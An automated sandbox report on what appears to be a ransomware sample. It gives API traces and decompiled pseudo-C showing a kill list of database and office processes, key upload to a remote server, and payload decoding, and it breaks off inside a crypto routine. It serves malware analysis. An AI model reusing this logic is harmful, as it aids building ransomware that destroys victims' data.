0x00405c1a
0x00405ba6
0x00405bb7
0x00405bc4
0x00405bd1
0x00405bd3
0x00405bd3
0x00405ba4
0x00405c2a
0x00405c30
0x00405c3d

APIs

Part of subcall function 004039B0: GetProcessHeap.KERNEL32(?,?,00404587,00000000,?,00000000), ref: 00403A4C

Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00406DB7
Part of subcall function 00406D90: GetUserNameW.ADVAPI32(00000000,?), ref: 00406DC8
Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00406DE6
Part of subcall function 00406D90: GetComputerNameW.KERNEL32 ref: 00406DF0
Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E10
Part of subcall function 00406D90: wsprintfW.USER32 ref: 00406E51
Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E6E
Part of subcall function 00406D90: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00406E92
Part of subcall function 00406D90: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,?,?), ref: 00406EB6
Part of subcall function 00406D90: RegCloseKey.KERNEL32(00000000), ref: 00406ED2

Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BF2
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BFD
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C13
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C1E
Part of subcall function 00406BA0: lstrlenW.KERNEL32(004048B6,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C34
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C3F
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C55
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C60
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C76
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C81
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C97
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CA2
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CC1
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CCC

VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 004057C0
CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0040586A
CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00405883
lstrlenA.KERNEL32(00000000), ref: 0040588C
lstrlenA.KERNEL32(?), ref: 00405894
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 004058A5
lstrlenA.KERNEL32(?), ref: 004058BF
lstrlenA.KERNEL32(00000000), ref: 004058E8
lstrlenA.KERNEL32(?), ref: 00405908
lstrlenA.KERNEL32(?), ref: 00405934
lstrlenA.KERNEL32(00000000), ref: 00405945
lstrlenA.KERNEL32(00000000), ref: 00405967
lstrcatW.KERNEL32(?,action=call&), ref: 00405981
lstrlenW.KERNEL32(?), ref: 0040598A
lstrcatW.KERNEL32(?,&pub_key=), ref: 0040599F
lstrlenW.KERNEL32(?), ref: 004059A2
lstrlenA.KERNEL32(00000000), ref: 004059AB
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,74CB69A0,00000000), ref: 004059C0
lstrcatW.KERNEL32(?,&priv_key=), ref: 004059CC
lstrlenW.KERNEL32(?), ref: 004059CF
lstrlenA.KERNEL32(00000000), ref: 004059DC
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,74CB69A0,00000000), ref: 004059F1
lstrcatW.KERNEL32(?,&version=2.1), ref: 004059FD
lstrlenW.KERNEL32(?), ref: 00405A09
VirtualAlloc.KERNEL32(00000000,-00000012,00003000,00000040), ref: 00405A1D
lstrlenW.KERNEL32(?), ref: 00405A2D
lstrlenW.KERNEL32(?), ref: 00405A4E
_memset.LIBCMT ref: 00405A97
lstrlenA.KERNEL32(?), ref: 00405AAA

Part of subcall function 00405C40: _memset.LIBCMT ref: 00405C6D

CryptBinaryToStringA.CRYPT32(?,-00000012,40000001,?,?), ref: 00405AF6
GetLastError.KERNEL32 ref: 00405B00
lstrlenA.KERNEL32(?), ref: 00405B07
VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 00405B16
lstrlenA.KERNEL32(?), ref: 00405B21
lstrlenA.KERNEL32(?), ref: 00405B41
lstrlenA.KERNEL32(?), ref: 00405B64
lstrlenA.KERNEL32(00000000), ref: 00405B73
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000000), ref: 00405B84
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405BB7
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405BC4
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405BD1
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405BF6
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405C03
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405C10
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405C2A

Strings

&version=2.1, xrefs: 004059F7
#shasj, xrefs: 00405A50
action=call&, xrefs: 0040597B
&pub_key=, xrefs: 00405999
&priv_key=, xrefs: 004059C6

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$Alloc$Free$lstrcat$BinaryByteCharCryptMultiStringWide$Name_memset$CloseComputerErrorHeapLastOpenProcessQueryUserValuewsprintf
String ID: #shasj$&priv_key=$&pub_key=$&version=2.1$action=call&
API String ID: 2781787645-879081296
Opcode ID: 2c772f64fd6f4d627e6b6cfa08910f6e4e47b14889520a2747ee6ef2705b858b
Instruction ID: 3a474d479e6cb3117948b119d777232bcba310bd2a7d749a27062e74eb6ba077
Opcode Fuzzy Hash: 2c772f64fd6f4d627e6b6cfa08910f6e4e47b14889520a2747ee6ef2705b858b
Instruction Fuzzy Hash: CEE18C71608301AFE710DF25CC85B6BBBE5EB88754F00492EF585A72A0D774AD05CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00404640 Relevance: 47.4, APIs: 10, Strings: 17, Instructions: 114
processmemorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00404640() {
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				char* _v76;
				char* _v80;
				char* _v84;
				char* _v88;
				char* _v92;
				char* _v96;
				char* _v100;
				char* _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				char* _v156;
				char* _v160;
				char* _v164;
				void* _v172;
				void* _t49;
				void* _t50;
				int _t51;
				int _t52;
				int _t53;
				void* _t60;
				WCHAR* _t62;
				void* _t65;
				void* _t70;
				signed int _t71;
				void* _t72;
				signed int _t74;
				void* _t76;

				_t76 = (_t74 & 0xfffffff8) - 0xa4;
				_v164 = L"msftesql.exe";
				_v160 = L"sqlagent.exe";
				_v156 = L"sqlbrowser.exe";
				_v152 = L"sqlservr.exe";
				_v148 = L"sqlwriter.exe";
				_v144 = L"oracle.exe";
				_v140 = L"ocssd.exe";
				_v136 = L"dbsnmp.exe";
				_v132 = L"synctime.exe";
				_v128 = L"mydesktopqos.exe";
				_v124 = L"agntsvc.exeisqlplussvc.exe";
				_v120 = L"xfssvccon.exe";
				_v116 = L"mydesktopservice.exe";
				_v112 = L"ocautoupds.exe";
				_v108 = L"agntsvc.exeagntsvc.exe";
				_v104 = L"agntsvc.exeencsvc.exe";
				_v100 = L"firefoxconfig.exe";
				_v96 = L"tbirdconfig.exe";
				_v92 = L"ocomm.exe";
				_v88 = L"mysqld.exe";
				_v84 = L"mysqld-nt.exe";
				_v80 = L"mysqld-opt.exe";
				_v76 = L"dbeng50.exe";
				_v72 = L"sqbcoreservice.exe";
				_v68 = L"excel.exe";
				_v64 = L"infopath.exe";
				_v60 = L"msaccess.exe";
				_v56 = L"mspub.exe";
				_v52 = L"onenote.exe";
				_v48 = L"outlook.exe";
				_v44 = L"powerpnt.exe";
				_v40 = L"steam.exe";
				_v36 = L"sqlservr.exe";
				_v32 = L"thebat.exe";
				_v28 = L"thebat64.exe";
				_v24 = L"thunderbird.exe";
				_v20 = L"visio.exe";
				_v16 = L"winword.exe";
				_v12 = L"wordpad.exe";
				_t49 = CreateToolhelp32Snapshot(2, 0); // executed
				_t70 = _t49;
				_v172 = _t70;
				_t50 = VirtualAlloc(0, 0x22c, 0x3000, 4); // executed
				_t60 = _t50;
				if(_t60 != 0) {
					 *_t60 = 0x22c;
					if(_t70 != 0xffffffff) {
						_push(_t60);
						Process32FirstW(_t70); // executed
					}
				}
				_t41 = _t60 + 0x24; // 0x24
				_t62 = _t41;
				do {
					_t71 = 0;
					do {
						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
						if(_t51 == 0) {
							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
							if(_t65 != 0) {
								TerminateProcess(_t65, 0);
								CloseHandle(_t65);
							}
						}
						_t71 = _t71 + 1;
						_t46 = _t60 + 0x24; // 0x24
						_t62 = _t46;
					} while (_t71 < 0x27);
					_t72 = _v172;
					_t52 = Process32NextW(_t72, _t60);
					_t48 = _t60 + 0x24; // 0x24
					_t62 = _t48;
				} while (_t52 != 0);
				if(_t60 != 0) {
					VirtualFree(_t60, 0, 0x8000); // executed
				}
				_t53 = FindCloseChangeNotification(_t72); // executed
				return _t53;
			}

0x00404646
0x00404653
0x0040465b
0x00404663
0x0040466b
0x00404673
0x0040467b
0x00404683
0x0040468b
0x00404693
0x0040469b
0x004046a3
0x004046ab
0x004046b3
0x004046bb
0x004046c3
0x004046cb
0x004046d3
0x004046db
0x004046e3
0x004046eb
0x004046f3
0x004046fb
0x00404703
0x0040470b
0x00404713
0x0040471b
0x00404723
0x0040472e
0x00404739
0x00404744
0x0040474f
0x0040475a
0x00404765
0x00404770
0x0040477b
0x00404786
0x00404791
0x0040479c
0x004047a7
0x004047b2
0x004047c4
0x004047c8
0x004047cc
0x004047d2
0x004047d6
0x004047d8
0x004047e1
0x004047e3
0x004047e5
0x004047e5
0x004047e1
0x004047f1
0x004047f1
0x004047f4
0x004047f4
0x00404800
0x00404805
0x0040480d
0x0040481b
0x0040481f
0x00404824
0x00404831
0x00404831
0x0040481f
0x0040483b
0x0040483c
0x0040483c
0x0040483f
0x00404844
0x0040484a
0x00404850
0x00404850
0x00404853
0x00404859
0x00404863
0x00404863
0x0040486a
0x00404872

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 004047B2
VirtualAlloc.KERNEL32(00000000,0000022C,00003000,00000004), ref: 004047CC
Process32FirstW.KERNEL32(00000000,00000000), ref: 004047E5
lstrcmpiW.KERNEL32(00000002,00000024), ref: 00404805
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00404815
TerminateProcess.KERNEL32(00000000,00000000), ref: 00404824
CloseHandle.KERNEL32(00000000), ref: 00404831
Process32NextW.KERNEL32(?,00000000), ref: 0040484A
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00404863
FindCloseChangeNotification.KERNEL32(?), ref: 0040486A

Strings

x@, xrefs: 00404673
@@, xrefs: 004047A7
@, xrefs: 0040465B
x@, xrefs: 00404744
<@, xrefs: 00404663
\@, xrefs: 00404765
l@, xrefs: 004046B3
L@, xrefs: 0040472E
8@, xrefs: 004046DB
P@, xrefs: 004046AB
@, xrefs: 004046CB
X@, xrefs: 004046E3
\@, xrefs: 0040466B
(@, xrefs: 0040479C
0@, xrefs: 00404723
`@, xrefs: 00404739
l@, xrefs: 004046EB

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: CloseProcessProcess32Virtual$AllocChangeCreateFindFirstFreeHandleNextNotificationOpenSnapshotTerminateToolhelp32lstrcmpi
String ID: @$(@$0@$8@$<@$@@$L@$P@$X@$\@$\@$`@$l@$l@$x@$x@$@
API String ID: 3023235786-3725814736
Opcode ID: 9888b97dcf90e8f6efa24b4065dea21d40555a31716fc4df83624dfcfe3835c8
Instruction ID: 5199461c7d7482eac4530f3025dd1142b0b19823d44abf373f40a8b8b0f494f1
Opcode Fuzzy Hash: 9888b97dcf90e8f6efa24b4065dea21d40555a31716fc4df83624dfcfe3835c8
Instruction Fuzzy Hash: 41515CB51083409FE7209F12994874BBBE4ABC5708F508D3EE6943B2D1D7B88819CF9E

Uniqueness

Uniqueness Score: -1.00%

Function 00407A00 Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 132
networkfilememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00407A00(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
				long _v8;
				void* _v12;
				void* _v16;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				short _v64;
				void* _t38;
				void* _t40;
				WCHAR* _t41;
				long _t55;
				long _t60;
				WCHAR* _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t68;

				_t65 = __ecx;
				_t38 =  *(__ecx + 4);
				if(_t38 != 0) {
					InternetCloseHandle(_t38);
				}
				E004077F0(_t65); // executed
				_t40 = InternetConnectW( *(_t65 + 4), _a4, 0x50, 0, 0, 3, 0, 0); // executed
				_t66 = _t40;
				_v8 = 0;
				_v12 = _t66;
				if(_t66 != 0) {
					_t41 = VirtualAlloc(0, 0x2800, 0x3000, 0x40); // executed
					_t63 = _t41;
					_v16 = _t63;
					wsprintfW(_t63, L"%s", _a8);
					_t64 = HttpOpenRequestW(_t66, _a36, _t63, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
					if(_t64 != 0) {
						_v64 = 0x6f0048;
						_v20 = 0;
						_v60 = 0x740073;
						_v56 = 0x20003a;
						_v52 = 0x6f006e;
						_v48 = 0x6f006d;
						_v44 = 0x650072;
						_v40 = 0x610072;
						_v36 = 0x73006e;
						_v32 = 0x6d006f;
						_v28 = 0x62002e;
						_v24 = 0x740069;
						if(HttpAddRequestHeadersW(_t64,  &_v64, 0xffffffff, 0) != 0) {
							if(HttpSendRequestW(_t64, _a40, _a44, _a12, _a16) == 0) {
								GetLastError();
							} else {
								_t68 = _a20;
								_t60 = _a24 - 1;
								_a4 = 0;
								if(InternetReadFile(_t64, _t68, _t60,  &_a4) != 0) {
									while(1) {
										_t55 = _a4;
										if(_t55 == 0) {
											goto L13;
										}
										 *((char*)(_t55 + _t68)) = 0;
										_a4 = 0;
										_v8 = 1;
										if(InternetReadFile(_t64, _t68, _t60,  &_a4) != 0) {
											continue;
										} else {
										}
										goto L13;
									}
								}
							}
						}
					}
					L13:
					InternetCloseHandle(_t64); // executed
					InternetCloseHandle(_v12);
					VirtualFree(_v16, 0, 0x8000); // executed
					return _v8;
				} else {
					return _t40;
				}
			}

0x00407a08
0x00407a0b
0x00407a10
0x00407a13
0x00407a13
0x00407a1b
0x00407a32
0x00407a38
0x00407a3a
0x00407a41
0x00407a46
0x00407a5f
0x00407a68
0x00407a70
0x00407a73
0x00407a97
0x00407a9b
0x00407aa3
0x00407aab
0x00407ab6
0x00407abd
0x00407ac4
0x00407acb
0x00407ad2
0x00407ad9
0x00407ae0
0x00407ae7
0x00407aee
0x00407af5
0x00407b04
0x00407b1b
0x00407b6c
0x00407b1d
0x00407b23
0x00407b26
0x00407b2b
0x00407b3a
0x00407b40
0x00407b40
0x00407b45
0x00000000
0x00000000
0x00407b47
0x00407b52
0x00407b59
0x00407b68
0x00000000
0x00000000
0x00407b6a
0x00000000
0x00407b68
0x00407b40
0x00407b3a
0x00407b1b
0x00407b04
0x00407b72
0x00407b79
0x00407b7e
0x00407b8a
0x00407b99
0x00407a4e
0x00407a4e
0x00407a4e

APIs

InternetCloseHandle.WININET(?), ref: 00407A13
InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 00407A32
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,00406946,ipv4bot.whatismyipaddress.com,004103B0,00000000), ref: 00407A5F
wsprintfW.USER32 ref: 00407A73
HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 00407A91
HttpAddRequestHeadersW.WININET(00000000,006F0048,000000FF,00000000), ref: 00407AFC
HttpSendRequestW.WININET(00000000,006F006D,006F006E,00000000,00740069), ref: 00407B13
InternetReadFile.WININET(00000000,0062002E,006D006E,00000000), ref: 00407B32
InternetReadFile.WININET(00000000,0062002E,006D006E,00000000), ref: 00407B60
GetLastError.KERNEL32 ref: 00407B6C
InternetCloseHandle.WININET(00000000), ref: 00407B79
InternetCloseHandle.WININET(00000000), ref: 00407B7E
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00406946,ipv4bot.whatismyipaddress.com), ref: 00407B8A

Strings

H, xrefs: 00407AA3
Fi@, xrefs: 00407B1D
r, xrefs: 00407AD2
i, xrefs: 00407AF5
s, xrefs: 00407AB6
., xrefs: 00407AEE
n, xrefs: 00407AC4
:, xrefs: 00407ABD
m, xrefs: 00407ACB
r, xrefs: 00407AD9
n, xrefs: 00407AE0
HTTP/1.1, xrefs: 00407A87
o, xrefs: 00407AE7

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
String ID: .$:$Fi@$H$HTTP/1.1$i$m$n$n$o$r$r$s
API String ID: 3906118045-996335725
Opcode ID: c8dddac5ca2f289de5ab4859de8dc5ee87e9a581b745c866a59695c1e2178a40
Instruction ID: 138ab0025d8835c4ee6cf1b85085083e902cc9d23406ca5e2eb97d724ccf74a6
Opcode Fuzzy Hash: c8dddac5ca2f289de5ab4859de8dc5ee87e9a581b745c866a59695c1e2178a40
Instruction Fuzzy Hash: AD418371A00209BBEB109F51DD49FDE7FB9FF04754F10402AFA04BA2A1C7B5A950CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004048A0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 165
threadsleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004048A0(void* __ecx) {
				void* _v8;
				CHAR* _v12;
				int _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				int _v44;
				int _v48;
				void* _v52;
				char _v72;
				void* _t50;
				void* _t51;
				int _t75;
				void* _t77;
				short* _t98;
				void* _t102;

				_t82 = __ecx;
				Sleep(0x3e8); // executed
				_t50 = E00404550(_t82); // executed
				if(_t50 != 0) {
					ExitProcess(0);
				}
				_t51 = CreateThread(0, 0, E00402D30, 0, 0, 0); // executed
				_v8 = _t51;
				if(_v8 != 0) {
					if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
						_t82 = _v8;
						TerminateThread(_v8, 0);
					}
					CloseHandle(_v8); // executed
				}
				E00404640(); // executed
				E004040A0(_t82);
				E00405EF0( &_v72); // executed
				_v36 = 0;
				_v32 = 0;
				_v24 = 0;
				_v40 = 0;
				_t97 =  &_v40;
				E00405EA0( &_v72,  &_v24,  &_v40,  &_v36,  &_v32);
				_v44 = 0;
				_v12 = 0;
				if(E00404880(_v24) != 0) {
					ExitProcess(0);
				}
				L8:
				while(_v44 == 0) {
					_t97 = _v40;
					_t77 = E00405750(_v24, _v40, _v36, _v32,  &_v12); // executed
					_t102 = _t102 + 0xc;
					if(_t77 != 0) {
						_v44 = 1;
					} else {
						Sleep(0x2710);
					}
				}
				E00405E60( &_v72);
				_v28 = 0;
				_v16 = 0;
				_v48 = 0;
				_v52 = 0;
				__eflags = _v12;
				if(_v12 != 0) {
					_v16 = lstrlenA(_v12);
					_v28 = VirtualAlloc(0, _v16, 0x3000, 4);
					_t97 = _v12;
					_t75 = CryptStringToBinaryA(_v12, 0, 1, _v28,  &_v16, 0, 0);
					__eflags = _t75;
					if(_t75 == 0) {
						ExitProcess(0);
					}
					_v48 = 1;
				}
				E00403FF0();
				InitializeCriticalSection(0x412ae8);
				__eflags = _v48;
				if(__eflags == 0) {
					E00403DE0( &_v72);
				} else {
					_t97 = _v16;
					E00403FC0(_v28, _v16, __eflags);
				}
				DeleteCriticalSection(0x412ae8);
				__eflags = E00403A60();
				if(__eflags != 0) {
					E00404330(__eflags);
				}
				_v20 = VirtualAlloc(0, 0x200, 0x3000, 4);
				__eflags = _v20;
				if(__eflags != 0) {
					GetModuleFileNameW(0, _v20, 0x100);
					E00403BA0(_v20, _t97, __eflags);
					VirtualFree(_v20, 0, 0x8000);
				}
				__eflags =  *0x412ae4;
				if( *0x412ae4 != 0) {
					_t98 =  *0x412ae4; // 0x8d0000
					ShellExecuteW(0, L"open", _t98, 0, 0, 5);
				}
				return E00405FC0( &_v72);
				goto L8;
			}

0x004048a0
0x004048ab
0x004048b1
0x004048b8
0x004048bc
0x004048bc
0x004048d1
0x004048d7
0x004048de
0x004048f4
0x004048f8
0x004048fc
0x004048fc
0x00404906
0x00404906
0x0040490c
0x00404911
0x00404919
0x0040491e
0x00404925
0x0040492c
0x00404933
0x00404942
0x0040494d
0x00404952
0x00404959
0x0040496a
0x0040496e
0x0040496e
0x00000000
0x00404974
0x00404986
0x0040498c
0x00404991
0x00404996
0x004049a5
0x00404998
0x0040499d
0x0040499d
0x004049ac
0x004049b1
0x004049b6
0x004049bd
0x004049c4
0x004049cb
0x004049d2
0x004049d6
0x004049e2
0x004049f8
0x00404a0b
0x00404a0f
0x00404a15
0x00404a17
0x00404a1b
0x00404a1b
0x00404a21
0x00404a21
0x00404a28
0x00404a32
0x00404a38
0x00404a3c
0x00404a4e
0x00404a3e
0x00404a3e
0x00404a44
0x00404a44
0x00404a58
0x00404a63
0x00404a65
0x00404a67
0x00404a67
0x00404a80
0x00404a83
0x00404a87
0x00404a94
0x00404a9d
0x00404aad
0x00404aad
0x00404ab3
0x00404aba
0x00404ac2
0x00404ad0
0x00404ad0
0x00404ae1
0x00000000

APIs

Sleep.KERNEL32(000003E8), ref: 004048AB

Part of subcall function 00404550: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045AC
Part of subcall function 00404550: lstrcpyW.KERNEL32 ref: 004045CF
Part of subcall function 00404550: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045D6
Part of subcall function 00404550: CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045EE
Part of subcall function 00404550: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045FA
Part of subcall function 00404550: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00404601
Part of subcall function 00404550: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040461B

ExitProcess.KERNEL32 ref: 004048BC
CreateThread.KERNEL32 ref: 004048D1
WaitForSingleObject.KERNEL32(00000000,00001388), ref: 004048E9
TerminateThread.KERNEL32(00000000,00000000), ref: 004048FC
CloseHandle.KERNEL32(00000000), ref: 00404906
ExitProcess.KERNEL32 ref: 0040496E

Strings

open, xrefs: 00404AC9

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: CreateErrorExitLastProcessThreadVirtual$AllocCloseFreeHandleMutexObjectSingleSleepTerminateWaitlstrcpylstrlen
String ID: open
API String ID: 3160775492-2758837156
Opcode ID: 2adaf577edfec1f8d3a4591ce7ab69e68017f846f83df95990bf0665a8258e38
Instruction ID: 2fe3139fa9bd6d9f2b7618e63861a0a4b2c33c0f11c60c5fb30394d5f0607533
Opcode Fuzzy Hash: 2adaf577edfec1f8d3a4591ce7ab69e68017f846f83df95990bf0665a8258e38
Instruction Fuzzy Hash: FD612CB0A40209ABEB14EFA1DD4ABEF7774AB84705F104029F601BA2D1DBB85E45CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00407C60 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 111
encryptionlibrarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00407C60(intOrPtr __ecx, void* __edx) {
				long* _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t37;
				void* _t40;
				struct HINSTANCE__* _t45;
				_Unknown_base(*)()* _t46;
				signed int _t54;
				long _t55;
				intOrPtr _t56;
				signed int _t58;
				signed int _t60;
				void* _t63;
				void* _t64;
				void* _t65;

				_t54 = 0;
				_v12 = __ecx;
				_t37 =  &_v8;
				_t63 = __edx;
				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000); // executed
				if(_t37 == 0) {
					L15:
					return _t54;
				} else {
					_t58 = 0;
					do {
						_t3 = _t58 + 0x61; // 0x61
						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
						_t58 = _t58 + 1;
					} while (_t58 < 0x1a);
					_t7 = _t63 + 1; // 0x1
					_t55 = _t7;
					_t40 = VirtualAlloc(0, _t55, 0x3000, 0x40); // executed
					_t64 = _t40;
					if(_t64 == 0 || _t63 >= _t55) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
